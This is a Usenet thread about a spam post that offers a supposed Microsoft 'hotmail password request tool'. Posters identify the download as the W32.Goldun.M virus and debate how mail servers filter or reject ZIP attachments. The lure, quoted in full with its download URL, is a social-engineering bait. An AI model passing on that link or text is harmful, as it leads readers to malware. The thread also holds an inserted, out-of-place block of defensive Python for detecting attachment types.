hotmail password request tool (intranet usage)

bernard tatin

Matthias said:
Is it a virus or a Trojan Horse? What does it do exactly?

My eMac cannot run it, so I cannot tell you.

I opened it with Emacs and it contains this:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity
    type="win32"
    processorArchitecture="*"
    version="6.0.0.0"
    name="mash"
  />

  <description>AutoIt 3</description>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity
        type="win32"
        name="Microsoft.Windows.Common-Controls"
        version="6.0.0.0"
        language="*"
        processorArchitecture="*"
        publicKeyToken="6595b64144ccf1df"
      />
    </dependentAssembly>
  </dependency>
</assembly>

I like the text - i work at microsoft ...

Bernard
 
Ulrich Hobelmann

DA said:
Let me see if I get this correctly ... you have stolen an internal
file from Microsoft and you are distributing it in a usenet group.
And you think anyone out here is dumb enough to blindly open an archive
file not knowing its contents.

What's wrong with unpacking an archive file? I do that every time
with software distributions. Most of the time they contain a
README file, but even if they didn't, you are free to look through
files, no?

If it says that the archive is *not* for everyone to read (like
"this is MS property"), then maybe that's a sign you should stop.
 
Ulrich Hobelmann

DA said:
Here at the University of Washington there have been demonstrations of
archive files that autoexecute when opened (not even unpacked) which is
more than enough to trigger an attack.

What's "opening" an archive file and how does it execute
something?? An archive is a container format, and as such,
passive data. You can look at the contents, or extract the files
within. If your look-at-archive program executes random stuff,
it's horribly broken.
How serious is the problem? All .zip files are deleted by our mail
server. I'll let you be the judge, knowing that, of how you feel about
opening an archive that is self-identified as stolen from an internal
web site (what does that say about the poster's integrity level) and
for which the poster has done his or her best to not reveal what is
actually contained.

WHAT? I'd get quite furious if someone just deleted all zips in
my email! Why not just delete all emails, then you can't get spam
anymore!
Microsoft is now involved. If this person is truly inside the company
they may well exit sooner than they planned ... and not through the
front door. I've as much use for thieves as for spammers.

I believe it's a virus inside, and no secret MS stuff. So even if
there is, how can I be guilty for just *looking* inside? Isn't
that the same as finding top-secret documents on the street and
looking at them? I didn't sign no NDA. Of course if it's MS
code, then distributing it would be illegal.
 
axel

In comp.lang.perl.misc DA Morgan said:
Don't know ... don't care. I handed it off, with full headers, to the
proper authorities and they were not amused.

With the spammer... or with you for wasting their time?

If you do this with every piece of spam you come across it indicates
that you have a lot of free time on your hands.

By the way, for your information, the OP, although spamming, for
which he should quite rightly be condemned, was not distributing
a file in a usenet group... just its location.

Axel
 
Frank van Bortel

This is happening to several of my friends, especially in academia.

You would think people *knew*, or at least, investigate, in
those circles <g>
 
Charles Newman

DA Morgan said:
Let me see if I get this correctly ... you have stolen an internal
file from Microsoft and you are distributing it in a usenet group.
And you think anyone out here is dumb enough to blindly open an archive
file not knowing its contents.

I have forwarded your posting to the Redmond Washington Police
Department. And hope they find you quickly.

I don't think the Redmond Police Dept will be able
to do much, as the posting is showing an address
in Holland, in the headers. 62.195.137.150
points to a computer at chello.nl, in Holland.
You should forward that post to the authorities
in Holland, if you want to do something, as
US courts have no jurisdiction in Holland.
 
Todger

Charles Newman wrote

I don't think the Redmond Police Dept will be able
to do much, as the posting is showing an address
in Holland, in the headers. 62.195.137.150
points to a computer at chello.nl, in Holland.
You should forward that post to the authorities
in Holland, if you want to do something, as
US courts have no jurisdiction in Holland.

The Dutch won't give a shit.
 
Charles Newman

Leythos said:
It's very common, and a good method, to delete Zip files that are
passworded or can't be opened and the contents scanned for malicious code
by the email av or firewall software. We always delete unscannable zip
files.

What if someone changed the file extension to
something like ZPP? That would get it past the
filters that delete ZIP files.
 
Ilgaz

What's wrong with unpacking an archive file? I do that every time with
software distributions. Most of the time they contain a README file,
but even if they didn't, you are free to look through files, no?

If it says that the archive is *not* for everyone to read (like "this
is MS property"), then maybe that's a sign you should stop.

It's probably a virus or malware etc. doing bad things, but the CPU and OS
are different.

This thing we see may be the first propagation of a new usenet/mail worm, and
I bet the poster has no clue what 'usenet' is; machine zombied.

Come on, nobody can be _that_ stupid lol.

Note to virus author: Your virus works but sends messages to a MAC
newsgroup! :p

Ilgaz Ocal
 
Ilgaz

I found this on our intranet (I work at Microsoft), and as I'm not
working there anymore soon I thought it would be nice for all you guys
and girls to get your hands on it. I've put it on
http://matweb.info/~hotmail/hotmail.rar

Have fun!

W32.Goldun.M virus, Intego VirusBarrier reports.

I saved a lot of people from checking the file, I bet ;)

Yay, so I have an anti-virus in fact :p

Ilgaz
 
Ilgaz

W32.Goldun.M virus, Intego VirusBarrier reports.

I saved a lot of people from checking the file, I bet ;)

Yay, so I have an anti-virus in fact :p

Ilgaz

And posted via groups.google.com, definitely reporting to Google. Very
interesting! Google has no NNTP access, yes?

Ilgaz
 
Terry Dykstra

Not necessarily. Decent content scanners determine what the file is not
based on the extension, but the signature. Same for files included within a
zip.

--
Terry Dykstra
Canadian Forest Oil Ltd.


Charles Newman said:
Leythos said:
It's very common, and a good method, to delete Zip files that are
passworded or can't be opened and the contents scanned for malicious code
by the email av or firewall software. We always delete unscannable zip
files.

What if someone changed the file extension to
something like ZPP? That would get it past the
filters that delete ZIP files.
 
Karl A. Krueger

[ Followups redirected to somewhere this is on topic. ]

In comp.lang.lisp Charles Newman said:
What if someone changed the file extension to something like ZPP? That
would get it past the filters that delete ZIP files.

We do not delete ZIP attachments (or -ever- alter message bodies) but it
is relatively trivial to detect the real file type of an attachment,
even if it is maliciously renamed to conceal it.

Email attachments are encoded using Base-64, which is deterministic --
so the "magic numbers" at the beginning of a binary data file will
always come out to a given pattern of Base-64 encoding. Thus, a simple
regular-expression matcher (as is built in to the Postfix MTA and many
others) will suffice to detect and reject messages with attachments of a
given type, even renamed.

It was in response to anti-virus software that can scan into ZIP files
that some email viruses started sending themselves as passworded files.
They'd include the password in the message body and instruct the user to
open the attachment using it. Nobody should be surprised that this
worked -- indeed, telling the user that the attached document is so
important that it had to be passworded is a good bit of social
engineering.


I personally consider it bad practice for a mail server to alter the
contents of a message, as by deleting an attachment. Doing so creates
the (correct!) impression that "the computer people are fooling with my
email" and damages users' trust. It also fails to inform the *sender*
that the message was not transmitted successfully -- and the SMTP
language has no way to express 'partial delivery'.

What's more, it's not terribly effective at reducing the fuss and bother
associated with viruses. Email viruses do not attach themselves to
'real' messages -- they send messages of their own, which serve no
purpose but to pass the virus. Stripping the attachment off such a
message and delivering it tells the user, "I know this message was junk
meant to harm you. I killed it. Here, have its corpse!" Except to the
sort of user who *likes* it when the cat delivers dead birds and mice,
this is silly behavior. Users have enough clutter in their mailboxes
without the corpses of viruses added to the mix.

When a message comes in that the security rules say must not be
delivered, the sensible thing for the mail server to do is to simply
reject it. SMTP rejection means the recipient's mail server doesn't
even accept the message for delivery -- it says "no, thank you" and
leaves it up to the sender's mail server to report the failure. In the
case of a virus, the sender usually just goes away and harasses someone
else. In the case of real mail erroneously intercepted, the rejection
can come with an informative error message ("Sorry, we don't allow ZIP
files in email. Please use a file transfer protocol when you want to
transfer files!") that the sender will then receive and can handle
appropriately.
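The two points made above, Terry Dykstra's that a content scanner goes by the file signature rather than the extension and Karl's that a magic number comes out as a fixed Base-64 prefix, as an added example that is not code from the thread or from Postfix: it derives the fixed prefix for a few magic numbers and applies it to the first encoded line of each attachment in a constructed MIME message whose ZIP has been renamed to .zpp. The magic table, the message and the sample bytes are constructed for the example; the resulting /^UEsDB/ pattern for ZIP is the standard one.

```python
import base64
import re
from email import message_from_string

# Leading bytes ("magic numbers") of file types commonly filtered at a mail gateway.
MAGIC = {
    "zip": b"PK\x03\x04",    # ZIP local file header (also .docx, .jar, ... containers)
    "exe": b"MZ",            # DOS/PE executable; a 2-byte magic fixes only 2 characters
    "rar": b"Rar!\x1a\x07",  # RAR archive
}

def base64_prefix(magic):
    """Base-64 characters fully determined by the leading bytes `magic`.
    Every 3 bytes become 4 characters of 6 bits, so len(magic)*8 // 6 characters
    depend only on `magic`; the next one shares bits with the following byte."""
    determined = len(magic) * 8 // 6
    return base64.b64encode(magic + b"\x00\x00").decode("ascii")[:determined]

# One anchored pattern per type, the shape of a Postfix body_checks entry (/^UEsDB/).
SIGNATURES = {kind: re.compile("^" + re.escape(base64_prefix(m)))
              for kind, m in MAGIC.items()}

def classify_attachments(raw_message):
    """Return (declared filename, detected type or None) for each base64 part.
    Only the first still-encoded line is inspected and the extension is ignored,
    so a ZIP renamed to .zpp is still reported as "zip"."""
    results = []
    for part in message_from_string(raw_message).walk():
        if part.get("Content-Transfer-Encoding", "").strip().lower() != "base64":
            continue
        lines = part.get_payload(decode=False).split()
        first_line = lines[0] if lines else ""
        kind = next((k for k, rx in SIGNATURES.items() if rx.match(first_line)), None)
        results.append((part.get_filename() or "", kind))
    return results

# Constructed sample (not a real archive): a ZIP local-file header plus filler,
# attached under a renamed .zpp extension as in the thread's question.
FAKE_ZIP = b"PK\x03\x04\x14\x00" + b"\x00" * 24 + b"demo.exe"
SAMPLE_MESSAGE = (
    "From: sender@example.invalid\nTo: you@example.invalid\n"
    "Subject: hotmail password tool\nMIME-Version: 1.0\n"
    'Content-Type: multipart/mixed; boundary="b1"\n\n'
    "--b1\nContent-Type: text/plain\n\nHave fun!\n"
    '--b1\nContent-Type: application/octet-stream; name="hotmail.zpp"\n'
    "Content-Transfer-Encoding: base64\n"
    'Content-Disposition: attachment; filename="hotmail.zpp"\n\n'
    + base64.encodebytes(FAKE_ZIP).decode("ascii") + "--b1--\n"
)
```

Running classify_attachments(SAMPLE_MESSAGE) yields [('hotmail.zpp', 'zip')]: the renamed attachment is identified without decoding it.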
 
André Thieme

Leythos said:
It's very common, and a good method, to delete Zip files that are
passworded or can't be opened and the contents scanned for malicious code
by the email av or firewall software. We always delete unscannable zip
files.

Why not put a passworded zip into a scannable zip?


André
--
 
peter pilsl

Charles said:
What if someone changed the file extension to
something like ZPP? That would get it past the
filters that delete ZIP files.

Then the usual user will not be able to open the zipfile when it has a
zpp-extension and not be able to click the file inside "naked_woman.exe"
which actually is a virus.

Deleting executable attachments and unscannable zips from the mail is
done in most of the companies I sysadmin. Some users still click on
everything that has an icon and a promising name. MS-click-me-advertising
has done some brain damage to the weaker minded.

best,
peter
 